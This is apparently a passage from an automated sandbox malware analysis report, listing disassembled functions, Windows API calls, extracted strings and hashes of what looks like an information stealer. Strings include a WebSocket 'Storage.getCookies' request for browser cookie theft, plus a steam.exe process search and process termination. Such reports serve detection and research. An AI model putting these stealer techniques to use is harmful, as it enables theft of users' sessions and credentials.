                                  • Instruction ID: dadfad409833514d2e6ee75e4e677a4179ff4d5d7f7aa9da6be95f4df5c68ee7
                                  • Opcode Fuzzy Hash: 41f7e305b9bd3d1739c6d1d72c39d04db6095e2ab783b46d91d8a713ef186867
                                  • Instruction Fuzzy Hash: 4B6186719101199BCB21EF74DC88AEE77B8EF58301F4084A5F949A7250DB34AA99DFA0
                                  Function 003648B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                  • API String ID: 909987262-758292691
                                  • Opcode ID: a70b3ff11be41c0568ea7f9e8189a23c7fed095d6b5b49c2b4ffeca4e30dc276
                                  • Instruction ID: 094d354c3525d053e0b753ebce6fdb57696aee6b5336016b734331529a5f4c79
                                  • Opcode Fuzzy Hash: a70b3ff11be41c0568ea7f9e8189a23c7fed095d6b5b49c2b4ffeca4e30dc276
                                  • Instruction Fuzzy Hash: A0A26871E112699FDF21DFA8C8807EDBBB6BF48300F1485A9D509AB245DB705E85CFA0
                                  Function 003523A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003523D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003523F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00352402
                                  • lstrlen.KERNEL32(\*.*), ref: 0035240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00352436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00352486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: 0196e1542cad807e24cf49cd10fcccd698c44afd58dfb47ecaa2ca464b84a9cf
                                  • Instruction ID: b316a346256e3acb0a9a322947c6485d4e63284549871209c6d985a47fd81ce0
                                  • Opcode Fuzzy Hash: 0196e1542cad807e24cf49cd10fcccd698c44afd58dfb47ecaa2ca464b84a9cf
                                  • Instruction Fuzzy Hash: E8413C715116159BCB23AF28EC85A9F77E4AF15301F855124BC4AAF221CF30AC599BA0
                                  Function 003646A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003646B9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 003646C9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 003646DB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 003646ED
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00364702
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00364711
                                  • CloseHandle.KERNEL32(00000000), ref: 00364718
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00364726
                                  • CloseHandle.KERNEL32(00000000), ref: 00364731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: b62f3d3c2bcc958c9c5693f9e23dea815712c3c622f4731397fb4ab822ebe6ce
                                  • Instruction ID: a02898a53e5fb8eaf638668b48745e2632d7f6f25da68e63399aa4f8f52f25db
                                  • Opcode Fuzzy Hash: b62f3d3c2bcc958c9c5693f9e23dea815712c3c622f4731397fb4ab822ebe6ce
                                  • Instruction Fuzzy Hash: CF016D31A51124ABE7225B60EC8DFFA377CAB5AB11F040198F90992184EF749988AA71
                                  Function 00364610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00364628
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00364638
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0036464A
                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00364660
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00364672
                                  • CloseHandle.KERNEL32(00000000), ref: 0036467D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID: steam.exe
                                  • API String ID: 2284531361-2826358650
                                  • Opcode ID: c5423b6b5d9c628c77c9b61473a7883ac45e872d091b6616f3f11ea77cd998f7
                                  • Instruction ID: 96e40c0870460497f03ff09648c7842d15b7af4213db7df29b8d29d03044d48c
                                  • Opcode Fuzzy Hash: c5423b6b5d9c628c77c9b61473a7883ac45e872d091b6616f3f11ea77cd998f7
                                  • Instruction Fuzzy Hash: 2301A271A011249BD7219F60EC4CFEA77BCEF19350F0001D5E90DD1040EFB48998ABE1
                                  Function 00354B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00354B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00354B7F
                                  • lstrlen.KERNEL32(00374CA8), ref: 00354B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354BA7
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 00354BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00354BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00354BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID:
                                  • API String ID: 2567437900-0
                                  • Opcode ID: 5a4b4ddada2892ffb41ac9cca82cc86e353ad0a6e7474098406f9e94d7ec11e0
                                  • Instruction ID: 0ea20d19d4d9787d574f3417969de94eda6c871c7711cdff201957f353bfb2ce
                                  • Opcode Fuzzy Hash: 5a4b4ddada2892ffb41ac9cca82cc86e353ad0a6e7474098406f9e94d7ec11e0
                                  • Instruction Fuzzy Hash: 50313B315211169BCB27EF24EC89E9F77E5AF54315F414124FC49AF221CB30EC659BA0
                                  Function 00708516 Relevance: 11.6, Strings: 8, Instructions: 1609COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: zy;$ N$B$[RKZ$f5y$j5y$p"e'$z",;$3q}
                                  • API String ID: 0-842368873
                                  • Opcode ID: 715d09f02b72b95d84899bb4230536faaae57995b046b51d50edff26fcbf0b01
                                  • Instruction ID: 38592469df958eb5c2121748800335b9eed827ee07ce4156b3efd808206d2bb6
                                  • Opcode Fuzzy Hash: 715d09f02b72b95d84899bb4230536faaae57995b046b51d50edff26fcbf0b01
                                  • Instruction Fuzzy Hash: 26B206F3A0C6149FE3046E29EC8567AFBE5EF94720F16493DEAC4C7344EA3558058693
                                  Function 00362D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003671FE
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00362D9B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00362DAD
                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00362DBA
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00362DEC
                                  • LocalFree.KERNEL32(00000000), ref: 00362FCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 7dd93055e631da5cc925ccc790fa1d24c71375eef6706aab4f9d1a27cbb62e59
                                  • Instruction ID: b4e2fc3b399b3f51817df9bde201318efe74fccaa510c88532811b16fdc2e2c2
                                  • Opcode Fuzzy Hash: 7dd93055e631da5cc925ccc790fa1d24c71375eef6706aab4f9d1a27cbb62e59
                                  • Instruction Fuzzy Hash: B2B11A70900605CFC716CF14D948B96B7F1FF44329F2AC1A9E4099B2AAD7769C86DF90
                                  Function 0070000E Relevance: 10.4, Strings: 7, Instructions: 1654COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: GO$J{'$[kg$u`]$*#H$8;q$>:
                                  • API String ID: 0-3040557483
                                  • Opcode ID: 81be87212b4df6ed3d378ca65ea9a7ccffdb21d8683c554addea755a37ceda19
                                  • Instruction ID: 33f9da7ce0abeba298e93a5e3e0c24b00f0434ada36679a67219b4eabbeb3cb1
                                  • Opcode Fuzzy Hash: 81be87212b4df6ed3d378ca65ea9a7ccffdb21d8683c554addea755a37ceda19
                                  • Instruction Fuzzy Hash: 2FB237F3A0C2009FE3046E2DEC8567AB7E9EF94720F1A493DE6C5C7744EA3598058697
                                  Function 006FAC44 Relevance: 10.4, Strings: 7, Instructions: 1653COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !U|w$/G~z$?^[_$Jm_$RPo$]w?_$]w?_
                                  • API String ID: 0-2299215225
                                  • Opcode ID: d49a18070ab4e451e94bc84ee8bf83438b41f3cfc2ddd458831b0bdcff4876cb
                                  • Instruction ID: 06e016fd2b768f26bc01d01886a49e8848558e152a5b16f35445c77b5e821c62
                                  • Opcode Fuzzy Hash: d49a18070ab4e451e94bc84ee8bf83438b41f3cfc2ddd458831b0bdcff4876cb
                                  • Instruction Fuzzy Hash: 58B24AF3A0C2049FE304AE2DEC8567ABBE5EFD4720F1A853DEAC4C7744E97558058692
                                  Function 00703607 Relevance: 10.4, Strings: 7, Instructions: 1630COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
